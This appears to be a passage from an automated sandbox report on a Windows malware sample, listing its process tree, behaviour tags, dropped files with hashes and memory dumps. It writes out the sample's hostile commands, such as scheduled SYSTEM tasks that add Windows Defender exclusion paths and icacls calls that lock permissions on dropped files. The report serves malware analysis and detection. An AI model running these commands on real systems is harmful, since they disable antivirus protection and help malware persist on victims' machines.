                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                SCHTASKS /Run /TN "Task1"
                                                                4⤵
                                                                  PID:1892
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  SCHTASKS /Delete /TN "Task1" /F
                                                                  4⤵
                                                                    PID:4784
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd.exe /c icacls "C:\Program Files (x86)\ZNMzfs\thumbs.db" /inheritance:r
                                                                  3⤵
                                                                  • Executes a command shell one-liner
                                                                  PID:1248
                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                    icacls "C:\Program Files (x86)\ZNMzfs\thumbs.db" /inheritance:r
                                                                    4⤵
                                                                    • Possible privilege escalation attempt
                                                                    • Modifies file permissions
                                                                    PID:4620
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd.exe /c icacls "C:\Program Files (x86)\ZNMzfs\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                                  3⤵
                                                                  • Executes a command shell one-liner
                                                                  PID:2428
                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                    icacls "C:\Program Files (x86)\ZNMzfs\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                                    4⤵
                                                                    • Possible privilege escalation attempt
                                                                    • Modifies file permissions
                                                                    PID:2584
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd.exe /c icacls "C:\Program Files (x86)\ZNMzfs\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                                                  3⤵
                                                                  • Executes a command shell one-liner
                                                                  PID:2628
                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                    icacls "C:\Program Files (x86)\ZNMzfs\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                                                    4⤵
                                                                    • Possible privilege escalation attempt
                                                                    • Modifies file permissions
                                                                    PID:5084
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                  3⤵
                                                                  • Indicator Removal: Clear Persistence
                                                                  PID:4624
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                                                                    4⤵
                                                                    • Scheduled Task/Job: Scheduled Task
                                                                    PID:6180
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    SCHTASKS /Run /TN "Task1"
                                                                    4⤵
                                                                      PID:6960
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      SCHTASKS /Delete /TN "Task1" /F
                                                                      4⤵
                                                                        PID:4532
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd.exe /c icacls "C:\Program Files (x86)\ZNMzfs\XPSPLOG.dll" /inheritance:r
                                                                      3⤵
                                                                      • Executes a command shell one-liner
                                                                      PID:5040
                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                        icacls "C:\Program Files (x86)\ZNMzfs\XPSPLOG.dll" /inheritance:r
                                                                        4⤵
                                                                        • Possible privilege escalation attempt
                                                                        • Modifies file permissions
                                                                        PID:1428
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd.exe /c icacls "C:\Program Files (x86)\ZNMzfs\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                                      3⤵
                                                                      • Executes a command shell one-liner
                                                                      PID:4836
                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                        icacls "C:\Program Files (x86)\ZNMzfs\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                                        4⤵
                                                                        • Possible privilege escalation attempt
                                                                        • Modifies file permissions
                                                                        PID:1504
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd.exe /c icacls "C:\Program Files (x86)\ZNMzfs\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                                                      3⤵
                                                                      • Executes a command shell one-liner
                                                                      PID:3124
                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                        icacls "C:\Program Files (x86)\ZNMzfs\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                                                        4⤵
                                                                        • Possible privilege escalation attempt
                                                                        • Modifies file permissions
                                                                        PID:5960
                                                                • C:\Windows\system32\cmd.exe
                                                                  "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\mbEes8" /t REG_DWORD /d 0 /f
                                                                  1⤵
                                                                  • Executes a command shell one-liner
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:1176
                                                                  • C:\Windows\System32\reg.exe
                                                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\mbEes8" /t REG_DWORD /d 0 /f
                                                                    2⤵
                                                                    • Windows security bypass
                                                                    PID:5156
                                                                • C:\Windows\system32\cmd.exe
                                                                  cmd.exe
                                                                  1⤵
                                                                    PID:6168
                                                                  • C:\Windows\system32\cmd.exe
                                                                    "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                    1⤵
                                                                    • Executes a command shell one-liner
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:5868
                                                                    • C:\Windows\System32\reg.exe
                                                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                      2⤵
                                                                      • Windows security bypass
                                                                      PID:1032
                                                                  • C:\Windows\system32\cmd.exe
                                                                    "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                    1⤵
                                                                    • Executes a command shell one-liner
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:6164
                                                                    • C:\Windows\System32\reg.exe
                                                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                      2⤵
                                                                      • Windows security bypass
                                                                      PID:5352
                                                                  • C:\Windows\system32\cmd.exe
                                                                    "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                    1⤵
                                                                    • Executes a command shell one-liner
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:4864
                                                                    • C:\Windows\System32\reg.exe
                                                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                      2⤵
                                                                      • Windows security bypass
                                                                      PID:4624
                                                                  • C:\Windows\system32\cmd.exe
                                                                    "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                                                    1⤵
                                                                    • Executes a command shell one-liner
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:1688
                                                                    • C:\Windows\System32\reg.exe
                                                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                                                      2⤵
                                                                      • Windows security bypass
                                                                      PID:2920
                                                                  • C:\Program Files (x86)\ZNMzfs\FBSx6k.exe
                                                                    "C:\Program Files (x86)\ZNMzfs\FBSx6k.exe"
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:1160
                                                                  • C:\Program Files (x86)\tilne2qD\OGGovcV27.exe
                                                                    "C:\Program Files (x86)\tilne2qD\OGGovcV27.exe"
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:6120
                                                                  • C:\Windows\system32\cmd.exe
                                                                    "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\ZNMzfs" /t REG_DWORD /d 0 /f
                                                                    1⤵
                                                                    • Executes a command shell one-liner
                                                                    PID:3708
                                                                    • C:\Windows\System32\reg.exe
                                                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\ZNMzfs" /t REG_DWORD /d 0 /f
                                                                      2⤵
                                                                        PID:5008
                                                                    • C:\Windows\system32\cmd.exe
                                                                      "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                      1⤵
                                                                      • Executes a command shell one-liner
                                                                      PID:3508
                                                                      • C:\Windows\System32\reg.exe
                                                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                        2⤵
                                                                          PID:3568
                                                                      • C:\Windows\system32\cmd.exe
                                                                        "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                        1⤵
                                                                        • Executes a command shell one-liner
                                                                        PID:2068
                                                                        • C:\Windows\System32\reg.exe
                                                                          reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                          2⤵
                                                                            PID:5376
                                                                        • C:\Windows\system32\cmd.exe
                                                                          "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                          1⤵
                                                                          • Executes a command shell one-liner
                                                                          PID:1216
                                                                          • C:\Windows\System32\reg.exe
                                                                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                            2⤵
                                                                              PID:6240
                                                                          • C:\Windows\system32\cmd.exe
                                                                            "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                                                            1⤵
                                                                            • Executes a command shell one-liner
                                                                            PID:2852
                                                                            • C:\Windows\System32\reg.exe
                                                                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                                                              2⤵
                                                                                PID:5584

                                                                            Network

                                                                                  MITRE ATT&CK Enterprise v16

                                                                                  Replay Monitor

                                                                                  Loading Replay Monitor...

                                                                                  Downloads

                                                                                  e59eb80.rbs

                                                                                  • Path C:\Config.Msi\e59eb80.rbs
                                                                                  • Size 7KB
                                                                                  • SHA256 16db694ee4951691904eb2e737859143bd63b3431296fe55eb41d222722e2071
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  FBSx6k.exe

                                                                                  • Path C:\Program Files (x86)\ZNMzfs\FBSx6k.exe
                                                                                  • Size 145KB
                                                                                  • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  XPSPLOG.dll

                                                                                  • Path C:\Program Files (x86)\ZNMzfs\XPSPLOG.dll
                                                                                  • Size 4.6MB
                                                                                  • SHA256 9fa6b0e7e8eaa37c823b97f628b9bb0bb50df60fcb769f541a4a00fc9141795b
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  image.png

                                                                                  • Path C:\Program Files (x86)\ZNMzfs\image.png
                                                                                  • Size 4.9MB
                                                                                  • SHA256 0c9e0083a209b3f88daee23bc15b987beee4ac973e7d0fe021934fa6b4e6a318
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  thumbs.db

                                                                                  • Path C:\Program Files (x86)\ZNMzfs\thumbs.db
                                                                                  • Size 358KB
                                                                                  • SHA256 df6ee4bda0dae7482c01ffb8b26f1f59648631174cd972083de622b3cfe41f9f
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  XPSPLOG.dll

                                                                                  • Path C:\Program Files (x86)\tilne2qD\XPSPLOG.dll
                                                                                  • Size 4.6MB
                                                                                  • SHA256 478cb6b449e21863ccfd432fb4a9cb47ee752670f1f737a87dcb3cbe18eb9c86
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  image.png

                                                                                  • Path C:\Program Files (x86)\tilne2qD\image.png
                                                                                  • Size 4.9MB
                                                                                  • SHA256 5d9a9f8a7b4c50c1ff6a1da31e319b02d68c4d463dce78c7175beb4ab4209552
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  StartupProfileData-NonInteractive

                                                                                  • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                  • Size 1KB
                                                                                  • SHA256 757235aa44be7687bd916f987f410df29260848d5deb020613c0b0c2b0b57e3e
                                                                                  • MD5 SHA1 SHA512 TLSH

                                                                                  __PSScriptPolicyTest_rtvonbve.b14.ps1

                                                                                  • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rtvonbve.b14.ps1
                                                                                  • Size 60B
                                                                                  • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                                                                  • MD5 SHA1 SHA512 TLSH

                                                                                  destopbak.ini

                                                                                  • Path C:\Users\Public\Music\destopbak.ini
                                                                                  • Size 2B
                                                                                  • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                                                                  • MD5 SHA1 SHA512

                                                                                  UxEnhance64.dll

                                                                                  • Path C:\Users\Public\mbEes8\UxEnhance64.dll
                                                                                  • Size 3.1MB
                                                                                  • SHA256 4d9b5b6c5a078982d68b758a8b11f75fefb3f6ddcb16764032f57862be458230
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  YDlelx.exe

                                                                                  • Path C:\Users\Public\mbEes8\YDlelx.exe
                                                                                  • Size 135KB
                                                                                  • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  adoresd.dat

                                                                                  • Path C:\Users\Public\mbEes8\adoresd.dat
                                                                                  • Size 4.8MB
                                                                                  • SHA256 daf7cf8f95ad96d41d5caef6d5b302314a8dfc26f22332676b87bf9a941cbaf5
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  msadox.tb

                                                                                  • Path C:\Users\Public\mbEes8\msadox.tb
                                                                                  • Size 8KB
                                                                                  • SHA256 b065fc8b9a004b620b4f548b61282aaea6f2ad42ac79b79fa464eec1eae5b7d8
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  MSIF11E.tmp

                                                                                  • Path C:\Windows\Installer\MSIF11E.tmp
                                                                                  • Size 5.7MB
                                                                                  • SHA256 f2f0cc6f7b1e3334ca03256781a86ab7c7c728a28de49714dde0e915fa4eb146
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  e59eb7f.msi

                                                                                  • Path C:\Windows\Installer\e59eb7f.msi
                                                                                  • Size 5.7MB
                                                                                  • SHA256 4fbd486a728a847fa6dd5515ec46f603a6a8624eb48e5ebed2516b0ed7690007
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  metadata-2

                                                                                  • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                                                                  • Size 26.1MB
                                                                                  • SHA256 3fd1418965bef403643136f20536caff51e2ac0d07e8ac795b131e43f8161896
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  {09fa909a-ecb6-4bef-9cd6-bf5d4b11fd4c}_OnDiskSnapshotProp

                                                                                  • Path \??\Volume{c4492839-0000-0000-0000-d08302000000}\System Volume Information\SPP\OnlineMetadataCache\{09fa909a-ecb6-4bef-9cd6-bf5d4b11fd4c}_OnDiskSnapshotProp
                                                                                  • Size 6KB
                                                                                  • SHA256 0cf752b35d38ec2c4eafb2b0bd15056ae938930ecdaa6514a4b35abfb2ebebbe
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  xxxx.ini

                                                                                  • Path \??\c:\xxxx.ini
                                                                                  • Size 2B
                                                                                  • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                                                                                  • MD5 SHA1 SHA512

                                                                                  memory/1160-268-0x0000000003610000-0x0000000003DF9000-memory.dmp

                                                                                  memory/1160-248-0x0000000000DE0000-0x0000000000DE1000-memory.dmp

                                                                                  memory/1160-249-0x0000000074FC0000-0x000000007570A000-memory.dmp

                                                                                  memory/1160-255-0x0000000003610000-0x0000000003DF9000-memory.dmp

                                                                                  memory/1160-267-0x0000000000E00000-0x0000000000E01000-memory.dmp

                                                                                  memory/1160-272-0x0000000000DE0000-0x0000000000DE1000-memory.dmp

                                                                                  memory/2740-74-0x0000020FC8850000-0x0000020FC910E000-memory.dmp

                                                                                  memory/2740-78-0x0000020FC8850000-0x0000020FC910E000-memory.dmp

                                                                                  memory/2740-87-0x0000020FC9240000-0x0000020FC92CA000-memory.dmp

                                                                                  memory/2740-91-0x0000020FC8850000-0x0000020FC910E000-memory.dmp

                                                                                  memory/2740-93-0x0000020FC8850000-0x0000020FC910E000-memory.dmp

                                                                                  memory/2740-94-0x0000020FC8850000-0x0000020FC910E000-memory.dmp

                                                                                  memory/2740-58-0x00007FFB4B3B0000-0x00007FFB4B3B2000-memory.dmp

                                                                                  memory/2740-59-0x00007FFB276E0000-0x00007FFB27BFE000-memory.dmp

                                                                                  memory/2740-64-0x0000020FC8850000-0x0000020FC910E000-memory.dmp

                                                                                  memory/2740-88-0x0000020FC9240000-0x0000020FC92CA000-memory.dmp

                                                                                  memory/2740-89-0x0000020FC9240000-0x0000020FC92CA000-memory.dmp

                                                                                  memory/2740-86-0x0000020FC9240000-0x0000020FC92CA000-memory.dmp

                                                                                  memory/2740-66-0x00007FFB4B3C0000-0x00007FFB4B3C2000-memory.dmp

                                                                                  memory/2740-67-0x0000020FC8850000-0x0000020FC910E000-memory.dmp

                                                                                  memory/2740-84-0x0000020FC9110000-0x0000020FC915E000-memory.dmp

                                                                                  memory/2740-71-0x0000020FC8850000-0x0000020FC910E000-memory.dmp

                                                                                  memory/2740-72-0x0000020FC8850000-0x0000020FC910E000-memory.dmp

                                                                                  memory/2740-73-0x0000020FC8850000-0x0000020FC910E000-memory.dmp

                                                                                  memory/4224-254-0x00000000034D0000-0x0000000003CB9000-memory.dmp

                                                                                  memory/4224-192-0x00000000034D0000-0x0000000003CB9000-memory.dmp

                                                                                  memory/4224-206-0x0000000004E00000-0x0000000004E14000-memory.dmp

                                                                                  memory/4224-218-0x00000000034D0000-0x0000000003CB9000-memory.dmp

                                                                                  memory/4224-195-0x00000000034D0000-0x0000000003CB9000-memory.dmp

                                                                                  memory/4224-194-0x0000000002970000-0x0000000002971000-memory.dmp

                                                                                  memory/4224-229-0x0000000010000000-0x0000000010061000-memory.dmp

                                                                                  memory/4224-187-0x0000000000EA0000-0x0000000000EA1000-memory.dmp

                                                                                  memory/4224-188-0x0000000074FC0000-0x000000007570A000-memory.dmp

                                                                                  memory/4224-285-0x00000000034D0000-0x0000000003CB9000-memory.dmp

                                                                                  memory/4224-199-0x00000000034D0000-0x0000000003CB9000-memory.dmp

                                                                                  memory/4620-106-0x00000239748A0000-0x00000239748BE000-memory.dmp

                                                                                  memory/4620-108-0x0000023974890000-0x000002397489A000-memory.dmp

                                                                                  memory/4620-107-0x00000239748C0000-0x0000023974972000-memory.dmp

                                                                                  memory/4620-103-0x0000023974600000-0x0000023974622000-memory.dmp

                                                                                  memory/4772-16-0x00007FFB383E0000-0x00007FFB383F2000-memory.dmp

                                                                                  memory/4772-44-0x00007FFB383E0000-0x00007FFB383F2000-memory.dmp

                                                                                  memory/4772-12-0x00007FFB4B3B0000-0x00007FFB4B3B2000-memory.dmp

                                                                                  memory/4772-13-0x00007FFB275A0000-0x00007FFB27BF2000-memory.dmp

                                                                                  memory/5808-281-0x00000000059C0000-0x0000000005D1B000-memory.dmp

                                                                                  memory/5808-291-0x0000000006390000-0x00000000063B0000-memory.dmp

                                                                                  memory/5808-297-0x0000000007330000-0x0000000007341000-memory.dmp

                                                                                  memory/5808-273-0x0000000004920000-0x0000000004956000-memory.dmp

                                                                                  memory/5808-274-0x0000000005150000-0x000000000579A000-memory.dmp

                                                                                  memory/5808-275-0x0000000004FE0000-0x0000000005002000-memory.dmp

                                                                                  memory/5808-296-0x00000000073B0000-0x0000000007446000-memory.dmp

                                                                                  memory/5808-279-0x0000000005900000-0x0000000005966000-memory.dmp

                                                                                  memory/5808-280-0x0000000005840000-0x00000000058A6000-memory.dmp

                                                                                  memory/5808-295-0x00000000071B0000-0x00000000071BA000-memory.dmp

                                                                                  memory/5808-294-0x0000000007140000-0x000000000715A000-memory.dmp

                                                                                  memory/5808-283-0x0000000005DE0000-0x0000000005DFE000-memory.dmp

                                                                                  memory/5808-284-0x0000000005E30000-0x0000000005E7C000-memory.dmp

                                                                                  memory/5808-293-0x0000000007780000-0x0000000007DFC000-memory.dmp

                                                                                  memory/5808-287-0x0000000006FD0000-0x0000000007006000-memory.dmp

                                                                                  memory/5808-288-0x00000000746F0000-0x000000007473C000-memory.dmp

                                                                                  memory/5808-292-0x0000000007010000-0x00000000070B3000-memory.dmp

                                                                                  memory/6120-271-0x0000000000A60000-0x0000000000A61000-memory.dmp

                                                                                  memory/6120-244-0x0000000074400000-0x0000000074B4A000-memory.dmp

                                                                                  memory/6120-264-0x0000000002E60000-0x0000000003649000-memory.dmp

                                                                                  memory/6120-263-0x0000000000A80000-0x0000000000A81000-memory.dmp

                                                                                  memory/6120-243-0x0000000000A60000-0x0000000000A61000-memory.dmp

                                                                                  memory/6120-252-0x0000000002E60000-0x0000000003649000-memory.dmp